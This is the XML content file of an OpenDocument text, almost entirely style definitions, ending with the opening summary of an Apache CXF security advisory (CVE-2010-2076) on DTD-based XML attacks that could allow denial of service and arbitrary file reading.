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Arial1" svg:font-family="Arial"/>
    <style:font-face style:name="OpenSymbol" svg:font-family="OpenSymbol"/>
    <style:font-face style:name="Lucida Sans" svg:font-family="'Lucida Sans'" style:font-family-generic="swiss"/>
    <style:font-face style:name="Verdana" svg:font-family="Verdan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0811in" fo:text-align="start" style:justify-single-word="false"/>
      <style:text-properties style:font-name="Arial"/>
    </style:style>
    <style:style style:name="P2" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:line-height="0.1693in" fo:text-align="start" style:justify-single-word="false"/>
      <style:text-properties style:font-name="Arial"/>
    </style:style>
    <style:style style:name="P3" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:line-height="0.0917in" fo:text-align="start" style:justify-single-word="false"/>
      <style:text-properties style:font-name="Arial"/>
    </style:style>
    <style:style style:name="P4" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:line-height="0.0874in" fo:text-align="start" style:justify-single-word="false"/>
      <style:text-properties style:font-name="Arial"/>
    </style:style>
    <style:style style:name="P5" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:margin-left="0in" fo:margin-right="0in" fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="99%" fo:text-align="start" style:justify-single-word="false" fo:keep-together="auto" fo:hyphenation-ladder-count="no-limit" fo:text-indent="0in" style:auto-text-indent="false"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7" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:margin-left="0in" fo:margin-right="0in" fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="0.1665in"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font-size="16pt" style:font-name-asian="Verdana" style:font-size-asian="16pt" style:font-name-complex="Verdana" style:font-size-complex="16pt" fo:hyphenate="false" fo:hyphenation-remain-char-count="2" fo:hyphenation-push-char-count="2"/>
    </style:style>
    <style:style style:name="P8"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font-size="12pt" fo:font-weight="normal" style:font-size-asian="10.5pt" style:font-weight-asian="normal" style:font-size-complex="12pt" style:font-weight-complex="normal" fo:hyphenate="false" fo:hyphenation-remain-char-count="2" fo:hyphenation-push-char-count="2"/>
    </style:style>
    <style:style style:name="P9" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:margin-left="0in" fo:margin-right="0in" fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="10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style:font-name="Arial" fo:font-size="12pt" fo:font-weight="normal" style:font-size-asian="10.5pt" style:font-weight-asian="normal" style:font-size-complex="12pt" style:font-weight-complex="normal" fo:hyphenate="false" fo:hyphenation-remain-char-count="2" fo:hyphenation-push-char-count="2"/>
    </style:style>
    <style:style style:name="P10" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:margin-left="0in" fo:margin-right="0in" fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="103%" fo:text-align="start"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11" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:margin-left="0in" fo:margin-right="0in" fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="91%" fo:text-align="start"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12" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:margin-left="0in" fo:margin-right="0in" fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="0.1646in"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bold" style:text-underline-mode="continuous" style:text-overline-mode="continuous" style:text-line-through-mode="continuous" style:letter-kerning="false" fo:background-color="transparent" style:font-name-asian="Verdana" style:font-size-asian="12.25pt" style:language-asian="zxx" style:country-asian="none" style:font-style-asian="italic" style:font-weight-asian="bold" style:font-name-complex="Verdana"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3" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:margin-left="0in" fo:margin-right="0in" fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="10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0.5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4" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:margin-left="0in" fo:margin-right="0in" fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="103%" fo:text-align="start"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5" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:margin-left="0in" fo:margin-right="0in" fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="99%" fo:text-align="start"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6" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:margin-left="0in" fo:margin-right="0in" fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="10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Verdana" style:font-size-asian="16pt" style:language-asian="zxx" style:country-asian="none" style:font-style-asian="normal" style:font-weight-asian="bold" style:font-name-complex="Verdana" style:font-size-complex="16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7" style:family="paragraph" style:parent-style-name="Standard" style:master-page-name="">
      <style:paragraph-properties fo:margin-left="0in" fo:margin-right="0in" fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="0.163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18" style:family="paragraph" style:parent-style-name="Standard" style:master-page-name="">
      <style:paragraph-properties fo:margin-left="0in" fo:margin-right="0in" fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="0.1681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19" style:family="paragraph" style:parent-style-name="Standard" style:master-page-name="">
      <style:paragraph-properties fo:margin-left="0in" fo:margin-right="0in" fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="0.0909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0" style:family="paragraph" style:parent-style-name="Standard" style:master-page-name="">
      <style:paragraph-properties fo:margin-left="0in" fo:margin-right="0in" fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="0.0882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1" style:family="paragraph" style:parent-style-name="Standard" style:master-page-name="">
      <style:paragraph-properties fo:margin-left="0in" fo:margin-right="0in" fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="0.165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2" style:family="paragraph" style:parent-style-name="Standard" style:master-page-name="">
      <style:paragraph-properties fo:margin-left="0in" fo:margin-right="0in" fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="0.0902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3" style:family="paragraph" style:parent-style-name="Standard" style:master-page-name="">
      <style:paragraph-properties fo:margin-left="0in" fo:margin-right="0in" fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="0.0874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4" style:family="paragraph" style:parent-style-name="Standard" style:master-page-name="">
      <style:paragraph-properties fo:margin-left="0in" fo:margin-right="0in" fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="0.0866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5" style:family="paragraph" style:parent-style-name="Standard" style:master-page-name="">
      <style:paragraph-properties fo:margin-left="0in" fo:margin-right="0in" fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="0.0846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6" style:family="paragraph" style:parent-style-name="Standard" style:master-page-name="">
      <style:paragraph-properties fo:margin-left="0in" fo:margin-right="0in" fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="0.1665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7" style:family="paragraph" style:parent-style-name="Standard" style:master-page-name="">
      <style:paragraph-properties fo:margin-left="0in" fo:margin-right="0in" fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="0.0917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8" style:family="paragraph" style:parent-style-name="Standard" style:master-page-name="">
      <style:paragraph-properties fo:margin-left="0in" fo:margin-right="0in" fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="0.1646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29" style:family="paragraph" style:parent-style-name="Standard" style:master-page-name="">
      <style:paragraph-properties fo:margin-left="0in" fo:margin-right="0in" fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="0.1417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30" style:family="paragraph" style:parent-style-name="Standard" style:master-page-name="">
      <style:paragraph-properties fo:margin-left="0in" fo:margin-right="0in" fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="0.1535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31" style:family="paragraph" style:parent-style-name="Standard" style:master-page-name="">
      <style:paragraph-properties fo:margin-left="0in" fo:margin-right="0in" fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="0.1472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32" style:family="paragraph" style:parent-style-name="Standard"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Verdana" style:font-size-asian="16pt" style:language-asian="zxx" style:country-asian="none" style:font-style-asian="normal" style:font-weight-asian="bold" style:font-name-complex="Verdana" style:font-size-complex="16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3" style:family="paragraph" style:parent-style-name="Standard" style:master-page-name="">
      <style:paragraph-properties fo:margin-left="0in" fo:margin-right="0in" fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="99%"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style:font-name-asian="Verdana" style:font-size-asian="14pt" style:language-asian="zxx" style:country-asian="none" style:font-style-asian="italic" style:font-weight-asian="normal" style:font-name-complex="Verdana" style:font-size-complex="14pt" style:language-complex="zxx" style:country-complex="none" style:font-style-complex="italic"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4" style:family="paragraph" style:parent-style-name="Standard" style:master-page-name="">
      <style:paragraph-properties fo:margin-left="0in" fo:margin-right="0in" fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="99%"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5" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:margin-left="0in" fo:margin-right="0in" fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="102%"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36" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:margin-left="0in" fo:margin-right="0in" fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="91%"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37" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:margin-left="0in" fo:margin-right="0in" fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="99%"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38" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:margin-left="0in" fo:margin-right="0in" fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="98%"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39"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Verdana" style:font-size-asian="16pt" style:language-asian="zxx" style:country-asian="none" style:font-style-asian="normal" style:font-weight-asian="bold" style:font-name-complex="Verdana" style:font-size-complex="16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0" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:margin-left="0in" fo:margin-right="0in" fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="99%"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bold" style:text-underline-mode="continuous" style:text-overline-mode="continuous" style:text-line-through-mode="continuous" style:letter-kerning="false" fo:background-color="transparent"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1" style:family="paragraph" style:parent-style-name="Standard">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bold" style:text-underline-mode="continuous" style:text-overline-mode="continuous" style:text-line-through-mode="continuous" style:letter-kerning="false" fo:background-color="transparent"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2" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:margin-left="0in" fo:margin-right="0in" fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="99%"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3" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:margin-left="0in" fo:margin-right="0in" fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="98%"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4" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:margin-left="0in" fo:margin-right="0in" fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="103%"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5" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:margin-left="0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Verdana" fo:font-size="16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Verdana" style:font-size-asian="16pt" style:language-asian="zxx" style:country-asian="none" style:font-style-asian="normal" style:font-weight-asian="bold" style:font-name-complex="Verdana" style:font-size-complex="16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6" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:margin-left="0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47" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:margin-left="0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style:font-name="Courier New" fo:font-size="10pt" fo:font-weight="normal" style:font-size-asian="10pt" style:font-weight-asian="normal" style:font-size-complex="10pt" style:font-weight-complex="normal" fo:hyphenate="false" fo:hyphenation-remain-char-count="2" fo:hyphenation-push-char-count="2"/>
    </style:style>
    <style:style style:name="P48" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:margin-left="0.1528in" fo:margin-right="0in" fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="100%" fo:text-align="start" style:justify-single-word="false" fo:keep-together="auto" fo:hyphenation-ladder-count="no-limit" fo:text-indent="0in" style:auto-text-indent="false" fo:break-before="auto" fo:break-after="auto" fo:background-color="#e6e6e6" fo:padding="0.0201in" fo:border="0.0008in solid #000000"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9" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:margin-left="0.1528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0" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:margin-left="0.1528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1" style:family="paragraph" style:parent-style-name="Standard" style:master-page-name="">
      <style:paragraph-properties fo:margin-left="0.1528in" fo:margin-right="0in" fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="100%" fo:text-align="start" style:justify-single-word="false" fo:keep-together="auto" fo:hyphenation-ladder-count="no-limit" fo:text-indent="0in" style:auto-text-indent="false" style:page-number="auto" fo:break-before="auto" fo:break-after="auto" fo:background-color="#e6e6e6" fo:padding="0.0201in" fo:border="0.0008in solid #000000"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2" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:margin-left="0.1528in" fo:margin-right="1.528in" fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="99%" fo:text-align="start" style:justify-single-word="false" fo:keep-together="auto" fo:hyphenation-ladder-count="no-limit" fo:text-indent="0in" style:auto-text-indent="false" fo:break-before="auto" fo:break-after="auto" fo:background-color="#e6e6e6" fo:padding="0.0201in" fo:border="0.0008in solid #000000"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Lucida Sans"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style:font-size-asian="10pt" style:language-asian="zxx" style:country-asian="none" style:font-style-asian="normal" style:font-weight-asian="normal" style:font-name-complex="Lucida Sans"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3" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:margin-left="-0.0098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0.5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4" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:margin-left="-0.0098in" fo:margin-right="0in" fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="100%"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55" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:margin-left="-0.0098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6" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:margin-left="-0.0098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style:font-name="Courier New" fo:font-size="10pt" style:font-size-asian="10pt" style:font-size-complex="10pt" fo:hyphenate="false" fo:hyphenation-remain-char-count="2" fo:hyphenation-push-char-count="2"/>
    </style:style>
    <style:style style:name="P57" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:margin-left="0in" fo:margin-right="0.1665in" fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="99%"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bold" style:text-underline-mode="continuous" style:text-overline-mode="continuous" style:text-line-through-mode="continuous" style:letter-kerning="false" fo:background-color="transparent"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8" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:margin-left="0in" fo:margin-right="0.1665in" fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="99%"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style:font-name="Arial" fo:hyphenate="false" fo:hyphenation-remain-char-count="2" fo:hyphenation-push-char-count="2"/>
    </style:style>
    <style:style style:name="P59" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:margin-left="0in" fo:margin-right="0.1665in" fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="99%" fo:text-align="start" style:justify-single-word="false" fo:hyphenation-ladder-count="no-limit" fo:text-indent="0in" style:auto-text-indent="false"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bold" style:text-underline-mode="continuous" style:text-overline-mode="continuous" style:text-line-through-mode="continuous" style:letter-kerning="false" fo:background-color="transparent" style:font-name-asian="Verdana" style:font-size-asian="14pt" style:language-asian="zxx" style:country-asian="none" style:font-style-asian="italic" style:font-weight-asian="bold" style:font-name-complex="Verdana"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0" style:family="paragraph" style:parent-style-name="Standard" style:master-page-name="">
      <style:paragraph-properties fo:margin-left="0.1984in" fo:margin-right="0in" fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="91%" fo:text-align="start" style:justify-single-word="false" fo:hyphenation-ladder-count="no-limit" fo:text-indent="0in" style:auto-text-indent="false" style:page-number="auto" fo:background-color="#e6e6e6" fo:padding="0.0201in" fo:border="0.0008in solid #000000"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1" style:family="paragraph" style:parent-style-name="Standard" style:master-page-name="">
      <style:paragraph-properties fo:margin-left="0.1984in" fo:margin-right="0in" fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="0.1528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font-size="10pt" style:font-name-asian="Lucida Sans" style:font-size-asian="10pt" style:font-name-complex="Lucida Sans" style:font-size-complex="10pt" fo:hyphenate="false" fo:hyphenation-remain-char-count="2" fo:hyphenation-push-char-count="2"/>
    </style:style>
    <style:style style:name="P62" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:margin-left="0.1984in" fo:margin-right="0in" fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="91%" fo:text-align="start" style:justify-single-word="false" fo:hyphenation-ladder-count="no-limit" fo:text-indent="0in" style:auto-text-indent="false" fo:background-color="#e6e6e6" fo:padding="0.0201in" fo:border="0.0008in solid #000000"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3" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:margin-left="0.1984in" fo:margin-right="0in" fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="91%" fo:text-align="start" style:justify-single-word="false" fo:hyphenation-ladder-count="no-limit" fo:text-indent="0in" style:auto-text-indent="false" fo:background-color="#e6e6e6" fo:padding="0.0201in" fo:border="0.0008in solid #000000" style:shadow="none" style:text-autospace="none" style:punctuation-wrap="simple" style:line-break="strict" style:vertical-align="auto" style:writing-mode="page">
        <style:tab-stops/>
        <style:background-image/>
      </style:paragraph-properties>
      <style:text-properties style:font-name="Courier New" fo:hyphenate="false" fo:hyphenation-remain-char-count="2" fo:hyphenation-push-char-count="2"/>
    </style:style>
    <style:style style:name="P64" style:family="paragraph" style:parent-style-name="Standard" style:master-page-name="Standard">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6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6pt" style:language-asian="zxx" style:country-asian="none" style:font-style-asian="normal" style:font-weight-asian="normal" style:font-name-complex="Verdana" style:font-size-complex="16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5" style:family="paragraph" style:parent-style-name="Standard" style:list-style-name="L4">
      <style:paragraph-properties fo:margin-left="0in" fo:margin-right="0in" fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="0.1646in" fo:text-align="start" style:justify-single-word="false" fo:hyphenation-ladder-count="no-limit" fo:text-indent="0in" style:auto-text-indent="false" fo:background-color="transparent" fo:padding="0in"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4pt" fo:letter-spacing="normal" fo:language="en" fo:country="US" fo:font-style="italic" fo:text-shadow="none" style:text-underline-style="none" fo:font-weight="bold" style:text-underline-mode="continuous" style:text-overline-mode="continuous" style:text-line-through-mode="continuous" style:letter-kerning="false" fo:background-color="transparent" style:font-name-asian="Verdana" style:font-size-asian="12.25pt" style:language-asian="zxx" style:country-asian="none" style:font-style-asian="italic" style:font-weight-asian="bold" style:font-name-complex="Verdana"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66" style:family="paragraph" style:parent-style-name="Standard" style:master-page-name="">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67" style:family="paragraph" style:parent-style-name="Standard" style:master-page-name="">
      <style:paragraph-properties fo:margin-left="0in" fo:margin-right="0in" fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="0.2252in"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68" style:family="paragraph" style:parent-style-name="Standard" style:list-style-name="L1">
      <style:paragraph-properties fo:line-height="0.0866in" fo:text-align="start" style:justify-single-word="false"/>
      <style:text-properties style:font-name="Arial"/>
    </style:style>
    <style:style style:name="P69" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:line-height="0.1618in" fo:text-align="start" style:justify-single-word="false"/>
      <style:text-properties style:font-name="Arial"/>
    </style:style>
    <style:style style:name="P70" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:line-height="0.1618in" fo:text-align="start" style:justify-single-word="false"/>
      <style:text-properties style:font-name="Arial" fo:font-size="16pt" fo:font-weight="bold" style:font-size-asian="14pt" style:font-weight-asian="bold" style:font-size-complex="16pt" style:font-weight-complex="bold"/>
    </style:style>
    <style:style style:name="P71" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:line-height="100%" fo:text-align="start" style:justify-single-word="false"/>
      <style:text-properties style:font-name="Arial"/>
    </style:style>
    <style:style style:name="P72" style:family="paragraph" style:parent-style-name="Standard" style:list-style-name="L1">
      <style:paragraph-properties fo:line-height="98%" fo:text-align="start" style:justify-single-word="false" style:punctuation-wrap="simple" style:vertical-align="auto">
        <style:tab-stops/>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73" style:family="paragraph" style:parent-style-name="Standard" style:list-style-name="L1" style:master-page-name="">
      <style:paragraph-properties fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="0.0862in" fo:text-align="start" style:justify-single-word="false" fo:keep-together="auto" fo:hyphenation-ladder-count="no-limit" style:page-number="auto" fo:break-before="auto" fo:break-after="auto" fo:background-color="transparent" fo:padding="0in" fo:border="none" style:shadow="none" fo:keep-with-next="auto" style:text-autospace="none" style:punctuation-wrap="hanging" style:line-break="strict" style:vertical-align="auto" style:writing-mode="page">
        <style:tab-stops/>
        <style:background-image/>
      </style:paragraph-properties>
      <style:text-properties style:font-name="Arial" fo:hyphenate="false" fo:hyphenation-remain-char-count="2" fo:hyphenation-push-char-count="2"/>
    </style:style>
    <style:style style:name="P74" style:family="paragraph" style:parent-style-name="Standard" style:list-style-name="L1" style:master-page-name="">
      <style:paragraph-properties fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="99%" fo:text-align="start" style:justify-single-word="false" fo:keep-together="auto" fo:hyphenation-ladder-count="no-limit" style:page-number="auto" fo:break-before="auto" fo:break-after="auto" fo:background-color="transparent" fo:padding="0in"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ymbo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Symbol" style:font-size-asian="12pt" style:language-asian="zxx" style:country-asian="none" style:font-style-asian="normal" style:font-weight-asian="normal" style:font-name-complex="Symbol"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5" style:family="paragraph" style:parent-style-name="Standard" style:list-style-name="L2">
      <style:paragraph-properties fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="99%" fo:text-align="start" style:justify-single-word="false" fo:hyphenation-ladder-count="no-limit"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6" style:family="paragraph" style:parent-style-name="Standard" style:list-style-name="L2">
      <style:paragraph-properties fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="97%" fo:text-align="start" style:justify-single-word="false" fo:hyphenation-ladder-count="no-limit" fo:background-color="transparent" fo:padding="0in"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7" style:family="paragraph" style:parent-style-name="Standard" style:list-style-name="L2">
      <style:paragraph-properties fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="98%" fo:text-align="start" style:justify-single-word="false" fo:keep-together="auto" fo:hyphenation-ladder-count="no-limit" fo:background-color="transparent" fo:padding="0in" fo:border="none" style:shadow="none" fo:keep-with-next="auto" style:text-autospace="none" style:punctuation-wrap="simple" style:line-break="strict" style:vertical-align="auto" style:writing-mode="page">
        <style:tab-stops>
          <style:tab-stop style:position="0in"/>
        </style:tab-stops>
        <style:background-image/>
      </style:paragraph-properties>
      <style:text-properties fo:font-variant="normal" fo:text-transform="none" style:use-window-font-color="true" style:text-outline="false" style:text-line-through-style="none" style:text-position="0% 100%" style:font-name="Verdana"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8" style:family="paragraph" style:parent-style-name="Standard" style:list-style-name="L3">
      <style:paragraph-properties fo:margin-left="0.5in" fo:margin-right="0in" fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="99%" fo:text-align="start" style:justify-single-word="false" fo:keep-together="auto" fo:hyphenation-ladder-count="no-limit" fo:text-indent="-0.25in" style:auto-text-indent="false" fo:background-color="transparent" fo:padding="0in" fo:border="none" style:shadow="none" fo:keep-with-next="auto" style:text-autospace="none" style:punctuation-wrap="simple" style:line-break="strict" style:vertical-align="auto" style:writing-mode="page">
        <style:tab-stops>
          <style:tab-stop style:position="0in"/>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79" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:margin-left="0.1528in" fo:margin-right="0in" fo:margin-top="0in" fo:margin-bottom="0in" fo:line-height="100%" fo:text-align="start" style:justify-single-word="false" fo:hyphenation-ladder-count="no-limit" fo:text-indent="0in" style:auto-text-indent="false" fo:background-color="#e6e6e6" fo:padding="0.0201in" fo:border="0.0008in solid #000000"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80" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:margin-top="0.1in" fo:margin-bottom="0in" fo:line-height="100%" fo:text-align="start" style:justify-single-word="false" fo:background-color="transparent">
        <style:background-image/>
      </style:paragraph-properties>
      <style:text-properties style:font-name="Arial" fo:font-size="16pt" fo:font-weight="bold" style:font-size-asian="14pt" style:font-weight-asian="bold" style:font-size-complex="16pt" style:font-weight-complex="bold"/>
    </style:style>
    <style:style style:name="T1" style:family="text">
      <style:text-properties style:font-name="Arial"/>
    </style:style>
    <style:style style:name="T2" style:family="text">
      <style:text-properties style:font-name="Arial" style:font-name-asian="Verdana" style:font-name-complex="Verdana"/>
    </style:style>
    <style:style style:name="T3" style:family="text">
      <style:text-properties style:font-name="Arial" style:font-name-asian="Verdana" style:font-size-asian="12pt" style:font-name-complex="Verdana"/>
    </style:style>
    <style:style style:name="T4" style:family="text">
      <style:text-properties style:font-name="Arial" style:font-name-asian="Lucida Sans" style:font-name-complex="Lucida Sans"/>
    </style:style>
    <style:style style:name="T5" style:family="text">
      <style:text-properties style:font-name="Arial" style:font-name-asian="Courier New" style:font-name-complex="Courier New"/>
    </style:style>
    <style:style style:name="T6" style:family="text">
      <style:text-properties fo:color="#0000ff" style:font-name="Arial" style:text-underline-style="solid" style:text-underline-width="auto" style:text-underline-color="font-color"/>
    </style:style>
    <style:style style:name="T7" style:family="text">
      <style:text-properties fo:font-variant="normal" fo:text-transform="none"/>
    </style:style>
    <style:style style:name="T8" style:family="text">
      <style:text-properties fo:font-variant="normal" fo:text-transform="none" style:use-window-font-color="true" style:text-outline="false" style:text-line-through-styl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9" style:family="text">
      <style:text-properties fo:font-variant="normal" fo:text-transform="none" style:use-window-font-color="true" style:text-outline="false" style:text-line-through-styl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style:font-size-asian="12pt" style:language-asian="zxx" style:country-asian="none" style:font-style-asian="normal" style:font-weight-asian="normal" style:font-name-complex="Lucida Sans" style:font-size-complex="12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10" style:family="text">
      <style:text-properties fo:font-variant="normal" fo:text-transform="none" fo:color="#000000" style:font-name="Arial1" fo:font-size="12pt" fo:letter-spacing="normal" fo:font-style="normal" fo:font-weight="normal"/>
    </style:style>
    <style:style style:name="T11" style:family="text">
      <style:text-properties style:font-name="Courier New"/>
    </style:style>
    <style:style style:name="T12" style:family="text">
      <style:text-properties style:font-name="Courier New" fo:font-size="10pt" fo:font-weight="normal" style:font-size-asian="10pt" style:font-weight-asian="normal" style:font-size-complex="10pt" style:font-weight-complex="normal"/>
    </style:style>
    <style:style style:name="T13" style:family="text">
      <style:text-properties fo:color="#808080"/>
    </style:style>
    <style:style style:name="T14" style:family="text">
      <style:text-properties style:text-outline="false"/>
    </style:style>
    <style:style style:name="T15" style:family="text">
      <style:text-properties style:text-line-through-style="none"/>
    </style:style>
    <style:style style:name="T16" style:family="text">
      <style:text-properties style:text-position="0% 100%"/>
    </style:style>
    <style:style style:name="T17" style:family="text">
      <style:text-properties fo:font-size="8pt"/>
    </style:style>
    <style:style style:name="T18" style:family="text">
      <style:text-properties fo:letter-spacing="normal"/>
    </style:style>
    <style:style style:name="T19" style:family="text">
      <style:text-properties fo:language="en" fo:country="US"/>
    </style:style>
    <style:style style:name="T20" style:family="text">
      <style:text-properties fo:font-style="normal"/>
    </style:style>
    <style:style style:name="T21" style:family="text">
      <style:text-properties fo:text-shadow="none"/>
    </style:style>
    <style:style style:name="T22" style:family="text">
      <style:text-properties style:text-underline-style="none"/>
    </style:style>
    <style:style style:name="T23" style:family="text">
      <style:text-properties fo:font-weight="normal"/>
    </style:style>
    <style:style style:name="T24" style:family="text">
      <style:text-properties style:text-underline-mode="continuous" style:text-overline-mode="continuous" style:text-line-through-mode="continuous"/>
    </style:style>
    <style:style style:name="T25" style:family="text">
      <style:text-properties style:letter-kerning="false"/>
    </style:style>
    <style:style style:name="T26" style:family="text">
      <style:text-properties fo:background-color="transparent"/>
    </style:style>
    <style:style style:name="T27" style:family="text">
      <style:text-properties style:font-name-asian="Verdana"/>
    </style:style>
    <style:style style:name="T28" style:family="text">
      <style:text-properties style:font-size-asian="8pt"/>
    </style:style>
    <style:style style:name="T29" style:family="text">
      <style:text-properties style:language-asian="zxx" style:country-asian="none"/>
    </style:style>
    <style:style style:name="T30" style:family="text">
      <style:text-properties style:font-style-asian="normal"/>
    </style:style>
    <style:style style:name="T31" style:family="text">
      <style:text-properties style:font-weight-asian="normal"/>
    </style:style>
    <style:style style:name="T32" style:family="text">
      <style:text-properties style:font-name-complex="Verdana"/>
    </style:style>
    <style:style style:name="T33" style:family="text">
      <style:text-properties style:font-size-complex="8pt"/>
    </style:style>
    <style:style style:name="T34" style:family="text">
      <style:text-properties style:language-complex="zxx" style:country-complex="none"/>
    </style:style>
    <style:style style:name="T35" style:family="text">
      <style:text-properties style:font-style-complex="normal"/>
    </style:style>
    <style:style style:name="T36" style:family="text">
      <style:text-properties style:font-weight-complex="normal"/>
    </style:style>
    <style:style style:name="T37" style:family="text">
      <style:text-properties style:text-rotation-angle="0" style:text-rotation-scale="line-height"/>
    </style:style>
    <style:style style:name="T38" style:family="text">
      <style:text-properties style:text-emphasize="none"/>
    </style:style>
    <style:style style:name="T39" style:family="text">
      <style:text-properties style:text-combine="none" style:text-combine-start-char="" style:text-combine-end-char=""/>
    </style:style>
    <style:style style:name="T40" style:family="text">
      <style:text-properties style:text-scale="100%"/>
    </style:style>
    <style:style style:name="T41" style:family="text">
      <style:text-properties style:font-relief="none"/>
    </style:style>
    <style:style style:name="T42" style:family="text">
      <style:text-properties text:display="true"/>
    </style:style>
    <style:style style:name="T43" style:family="text">
      <style:text-properties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pache CXF Security Advisory (CVE-2010-2076)</text:p>
      <text:p text:style-name="P1"/>
      <text:p text:style-name="P33">DTD based XML attacks</text:p>
      <text:p text:style-name="P2"/>
      <text:p text:style-name="P66">Author: Daniel Kulp • First version: June 15, 2010 • First published: June 16, 2010 • Last updated: June 16, 2010</text:p>
      <text:p text:style-name="P70"/>
      <text:p text:style-name="P80">Summary</text:p>
      <text:p text:style-name="P69"/>
      <text:p text:style-name="P71">The Apache CXF team recently <text:span text:style-name="T10">discovered a security issue that may allow an attacker to carry out denial of service attacks and to read arbitrary files on the file system of the node where CXF runs. <text:s text:c="2"/>This vulnerability may potentially be exploited on any CXF installation that receives XML messages from untrusted sources.</text:span></text:p>
      <text:p text:style-name="P69"/>
      <text:p text:style-name="P69"/>
      <text:p text:style-name="P32">1. Description</text:p>
      <text:p text:style-name="P3"/>
